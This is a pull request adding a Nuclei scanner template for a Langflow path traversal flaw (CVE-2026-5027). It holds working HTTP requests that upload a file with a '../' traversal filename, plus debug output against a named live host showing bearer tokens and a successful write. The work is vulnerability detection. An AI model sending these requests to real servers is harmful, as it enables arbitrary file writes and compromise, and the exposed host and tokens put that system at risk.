### PR TITLE
Create CVE-2026-5027.yaml

### DIFF
--- a/http/cves/2026/CVE-2026-5027.yaml
+++ b/http/cves/2026/CVE-2026-5027.yaml
@@ -13,6 +13,7 @@ info:
   reference:
     - https://github.com/langflow-ai/langflow/pull/12227
     - https://github.com/0xBlackash/CVE-2026-5027
+    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -26,12 +27,56 @@ info:
     fofa-query: title="Langflow"
   tags: cve,cve2026,langflow,lfi,intrusive,kev
 
+flow: http(1) || http(2)
+
 http:
   - raw:
       - |
         GET /api/v1/auto_login HTTP/1.1
         Host: {{Hostname}}
         Accept: application/json
+
+      - |
+        POST /api/v2/files HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{access_token}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650
+
+        ------WebKitFormBoundarya3f2c8d9e7b14650
+        Content-Disposition: form-data; name="file"; filename="../../../../../../../../../tmp/{{randstr}}.txt"
+        Content-Type: text/plain
+
+        {{randstr}}
+        ------WebKitFormBoundarya3f2c8d9e7b14650--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_2 == 201"
+          - "contains_all(body_2, 'id','name','path')"
+        condition: and
+
+    extractors:
+      - type: json
+        name: access_token
+        part: body_1
+        json:
+          - ".access_token"
+        internal: true
+
+      - type: json
+        part: body_2
+        json:
+          - ".path"
+
+  - raw:
+      - |
+        POST /api/v1/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept: application/json
+
+        username={{username}}&password={{password}}
 
       - |
         POST /api/v2/files HTTP/1.1

--- a/http/cves/2026/CVE-2026-5027.yaml
+++ b/http/cves/2026/CVE-2026-5027.yaml
@@ -1,0 +1,67 @@
+id: CVE-2026-5027
+
+info:
+  name: Langflow <= 1.8.4 - Path Traversal to RCE via File Upload
+  author: pussycat0x
+  severity: high
+  description: |
+    The application contains a path traversal vulnerability caused by unsanitized 'filename' parameter in the 'POST /api/v2/files' multipart form data, letting attackers write files to arbitrary filesystem locations, exploit requires crafted request.
+  impact: |
+    Attackers can write files to arbitrary locations, potentially leading to system compromise or data tampering.
+  remediation: |
+    Sanitize the 'filename' parameter to prevent path traversal or update to the latest secure version.
+  reference:
+    - https://github.com/langflow-ai/langflow/pull/12227
+    - https://github.com/0xBlackash/CVE-2026-5027
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2026-5027
+    cwe-id: CWE-22
+  metadata:
+    max-request: 2
+    vendor: langflow-ai
+    product: langflow
+    shodan-query: title:"Langflow"
+    fofa-query: title="Langflow"
+  tags: cve,cve2026,langflow,lfi,intrusive,kev
+
+http:
+  - raw:
+      - |
+        GET /api/v1/auto_login HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+
+      - |
+        POST /api/v2/files HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{access_token}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650
+
+        ------WebKitFormBoundarya3f2c8d9e7b14650
+        Content-Disposition: form-data; name="file"; filename="../../../../../../../../../tmp/{{randstr}}.txt"
+        Content-Type: text/plain
+
+        {{randstr}}
+        ------WebKitFormBoundarya3f2c8d9e7b14650--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_2 == 201"
+          - "contains_all(body_2, 'id','name','path')"
+        condition: and
+
+    extractors:
+      - type: json
+        name: access_token
+        part: body_1
+        json:
+          - ".access_token"
+        internal: true
+
+      - type: json
+        part: body_2
+        json:
+          - ".path"


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

##Debug Data

```
nuclei -u http://jpn41eidl743rm0tpxrazi0xjw8hp0bp.tryneoai.com:7860 -t cve.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.8.0

                projectdiscovery.io

[INF] Current nuclei version: v3.8.0 (latest)
[INF] Current nuclei-templates version: v10.4.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 179
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2026-5027] Dumped HTTP request for http://jpn41eidl743rm0tpxrazi0xjw8hp0bp.tryneoai.com:7860/api/v1/auto_login

GET /api/v1/auto_login HTTP/1.1
Host: jpn41eidl743rm0tpxrazi0xjw8hp0bp.tryneoai.com:7860
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: application/json
Accept-Encoding: gzip

[DBG] [CVE-2026-5027] Dumped HTTP response http://jpn41eidl743rm0tpxrazi0xjw8hp0bp.tryneoai.com:7860/api/v1/auto_login

HTTP/1.1 200 OK
Connection: close
Content-Length: 249
Content-Type: application/json
Date: Wed, 10 Jun 2026 06:42:25 GMT
Server: uvicorn
Set-Cookie: access_token_lf=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI2OGMxNGQ4Mi01NzYxLTQ4NGEtOTc2Ny0zYTBiYmQwMjIxM2YiLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxODEyNjA5NzQ2fQ.w3VwQl_TzCkQY-2w1l27LhhbNc8Sm68_dyv-FyD-bro; Path=/; SameSite=lax
Set-Cookie: apikey_tkn_lflw=""; Path=/; SameSite=lax

{"access_token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI2OGMxNGQ4Mi01NzYxLTQ4NGEtOTc2Ny0zYTBiYmQwMjIxM2YiLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxODEyNjA5NzQ2fQ.w3VwQl_TzCkQY-2w1l27LhhbNc8Sm68_dyv-FyD-bro","refresh_token":null,"token_type":"bearer"}
[INF] [CVE-2026-5027] Dumped HTTP request for http://jpn41eidl743rm0tpxrazi0xjw8hp0bp.tryneoai.com:7860/api/v2/files

POST /api/v2/files HTTP/1.1
Host: jpn41eidl743rm0tpxrazi0xjw8hp0bp.tryneoai.com:7860
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 263
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI2OGMxNGQ4Mi01NzYxLTQ4NGEtOTc2Ny0zYTBiYmQwMjIxM2YiLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxODEyNjA5NzQ2fQ.w3VwQl_TzCkQY-2w1l27LhhbNc8Sm68_dyv-FyD-bro
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650
Cookie: access_token_lf=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI2OGMxNGQ4Mi01NzYxLTQ4NGEtOTc2Ny0zYTBiYmQwMjIxM2YiLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxODEyNjA5NzQ2fQ.w3VwQl_TzCkQY-2w1l27LhhbNc8Sm68_dyv-FyD-bro; apikey_tkn_lflw=""
Accept-Encoding: gzip

------WebKitFormBoundarya3f2c8d9e7b14650
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../tmp/3EvzHj7DS34wX4ZsDCIQQdGbWSh.txt"
Content-Type: text/plain

3EvzHj7DS34wX4ZsDCIQQdGbWSh
------WebKitFormBoundarya3f2c8d9e7b14650--
[DBG] [CVE-2026-5027] Dumped HTTP response http://jpn41eidl743rm0tpxrazi0xjw8hp0bp.tryneoai.com:7860/api/v2/files

HTTP/1.1 201 Created
Connection: close
Content-Length: 248
Content-Type: application/json
Date: Wed, 10 Jun 2026 06:42:25 GMT
Server: uvicorn

{"id":"c24b91ba-3a9c-49e1-b302-e4eb58799689","name":"../../../../../../../../../tmp/3EvzHj7DS34wX4ZsDCIQQdGbWSh","path":"68c14d82-5761-484a-9767-3a0bbd02213f/../../../../../../../../../tmp/3EvzHj7DS34wX4ZsDCIQQdGbWSh.txt","size":27,"provider":null}
[CVE-2026-5027:dsl-1] [http] [high] http://jpn41eidl743rm0tpxrazi0xjw8hp0bp.tryneoai.com:7860/api/v2/files ["68c14d82-5761-484a-9767-3a0bbd02213f/../../../../../../../../../tmp/3EvzHj7DS34wX4ZsDCIQQdGbWSh.txt"]
[INF] Scan completed in 2.003512625s. 1 matches found.

```

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
